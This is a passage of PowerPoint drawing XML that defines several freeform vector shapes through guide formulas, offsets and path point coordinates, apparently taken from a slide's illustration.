                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>
                  <a:gd name="T114" fmla="*/ 102 h 10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4" h="102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>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5149" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>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5150" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>
                  <a:gd name="T25" fmla="*/ 0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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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5151" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1"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5152" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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5153" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 39"/>
                  <a:gd name="T1" fmla="*/ 0 h 41"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 0 h 41"/>
                  <a:gd name="T4" fmla="*/ 0 w 39"/>
                  <a:gd name="T5" fmla="*/ 0 h 41"/>
                  <a:gd name="T6" fmla="*/ 0 w 39"/>
                  <a:gd name="T7" fmla="*/ 0 h 41"/>
                  <a:gd name="T8" fmla="*/ 0 w 39"/>
                  <a:gd name="T9" fmla="*/ 0 h 41"/>
                  <a:gd name="T10" fmla="*/ 0 w 39"/>
                  <a:gd name="T11" fmla="*/ 0 h 41"/>
                  <a:gd name="T12" fmla="*/ 0 w 39"/>
                  <a:gd name="T13" fmla="*/ 0 h 41"/>
                  <a:gd name="T14" fmla="*/ 0 w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 39"/>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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
